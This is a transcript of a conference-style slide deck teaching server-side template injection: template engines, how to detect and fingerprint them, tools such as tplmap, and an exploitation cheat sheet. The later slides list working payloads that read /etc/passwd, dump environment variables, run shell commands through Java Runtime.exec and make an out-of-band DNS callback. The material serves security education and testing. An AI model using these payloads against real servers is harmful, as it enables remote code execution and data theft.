Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Server Side Template Injection

Dhamu
September 25, 2021

Server Side Template Injection

Dhamu

September 25, 2021
Tweet

Other Decks in Technology

Transcript

  1. Server Side Template
    Injection

    View full-size slide

  2. Whoami
    Dhamotharan
    Offensive Web Application Security Researcher
    Occasional bug bounty hunter on Hackerone ,Bugcrowd,
    etc.
    Dhamu_offi on twitter

    View full-size slide

  3. AGENDA
    Template Injection
    What is SSTI
    Methodology
    Automated Tools
    Cheatsheet
    Demo

    View full-size slide

  4. Template Injection
    Template injection allows an attacker to include template code into an existing
    (or not) template. A template engine makes designing HTML pages easier by
    using static template files which at runtime replaces variables/placeholders with
    actual values in the HTML pages

    View full-size slide

  5. Template Injection
    Template engines are designed to combine templates with a data model to produce result
    documents which helps populating dynamic data into web pages. Template engines can be
    used to display information about users, products etc. Some of the most popular template
    engines can be listed as the followings:
    ● PHP – Smarty, Twigs
    ● Java – Velocity, Freemaker
    ● Python – JINJA, Mako, Tornado
    ● JavaScript – Jade, Rage
    ● Ruby – Liquid

    View full-size slide

  6. Server Side Template
    Injection SSTI
    Tip
    Server-side template
    injection is a vulnerability
    where the attacker injects
    malicious input into a
    template to execute
    commands on the server-
    side.

    View full-size slide

  7. SSTI
    Server-side template injection is a vulnerability where the attacker injects
    malicious input into a template to execute commands on the server-side. This
    vulnerability occurs when invalid user input is embedded into the template
    engine which can generally lead to remote code execution (RCE)

    View full-size slide

  8. Tip
    ${7*7}
    ${{7*7}}
    #{ 7 * 7 }
    <%= 7 * 7 %>

    View full-size slide

  9. Server Side Template
    Injection
    Methodology

    View full-size slide

  10. Methodology
    ➔ Detect
    ➔ Identify
    ➔ Exploit

    View full-size slide

  11. Detect.
    This vulnerability can appear in two
    distinct contexts, each of which requires
    its own detection method:
    1. Plaintext context
    2. Code context
    Tip
    smarty=Hello {user.name}
    Hello user1
    smarty=Hello ${7*7}
    Hello 49
    Story for illustration purposes only
    Tip
    personal_greeting=use
    rname
    Hello user0

    View full-size slide

  12. Plaintext context
    The given input is being rendered and
    reflected into the response.
    Try to set mathematical operations within a
    template expression:
    Tip
    render('Hello ' +
    username)
    http://vulnerable-
    website.com/?username=$
    {7*7}
    {{7*7}}
    ${7*7}
    <%= 7*7 %>
    ${{7*7}}

    View full-size slide

  13. Code Context
    In these cases the user input
    is being placed within a
    template expression:
    Tip
    greeting =
    getQueryParameter('greeting')
    engine.render("Hello
    {{"+greeting+"}}", data)
    http://vulnerable-
    website.com/?greeting=data.usernam
    e}}

    View full-size slide

  14. Identify
    The template injection potential, the next step is to identify the template engine.
    Although there are a huge number of templating languages, many of them use very similar
    syntax that is specifically chosen not to clash with HTML characters. As a result, it can be
    relatively simple to create probing payloads to test which template engine is being used.

    View full-size slide

  15. Exploit
    Template engines to show the exploit methodology in practice, and make a case for
    the severity of the issue. The findings may appear to show flaws in template engines
    themselves, but unless an engine markets itself as suitable for user-submitted
    templates the responsibility for preventing template injection ultimately lies with web
    application developers.
    Lists of builtin methods, functions, filters, and variables.
    Lists of extensions/plugins - some may be enabled by default.

    View full-size slide

  16. Exploit
    Generic
    In this wordlist you can find variables defined in the environments of some of the
    engines mentioned below:
    https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-
    special-vars.txt
    https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Sid
    e%20Template%20Injection

    View full-size slide

  17. Automated Tools
    Tplmap assists in the exploitation of Code Injection and Server-Side Template
    Injection vulnerabilities with several sandbox escape techniques to get access to the
    underlying operating system.
    The tool and its test suite are developed to research the SSTI vulnerability class and to
    be used as offensive security tools during web application penetration tests.

    View full-size slide

  18. CheatSheet
    ● Ruby
    ○ Basic injections
    ○ Retrieve /etc/passwd
    ○ List files and directories
    ● Java
    ○ Basic injection
    ○ Retrieve the system’s environment variables
    ○ Retrieve /etc/passwd
    ● Expression Language EL
    ○ Basic injection
    ○ Code execution

    View full-size slide

  19. Ruby - Basic injections
    ERB:
    <%= 7 * 7 %>
    Slim:
    #{ 7 * 7 }
    Ruby - Retrieve /etc/passwd
    <%= File.open('/etc/passwd').read %>
    Ruby - List files and directories
    <%= Dir.entries('/') %>

    View full-size slide

  20. Java - Basic injection
    ${7*7}
    ${class.getClassLoader()}
    Java - Retrieve the system’s environment variables
    ${T(java.lang.System).getenv()}
    Java - Retrieve /etc/passwd
    ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}

    View full-size slide

  21. Expression Language EL
    Expression Language EL - Basic injection
    ${1+1}
    #{1+1}
    Expression Language EL - One-Liner injections not including code execution
    // DNS Lookup
    ${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","xxxxxxxxxxxxxx.bur
    pcollaborator.net")}

    View full-size slide

  22. Server-Side-Template-Injection - Linux - Privilege
    Escalation
    https://github.com/Dhamuharker/Server-Side-Template-
    Injection

    View full-size slide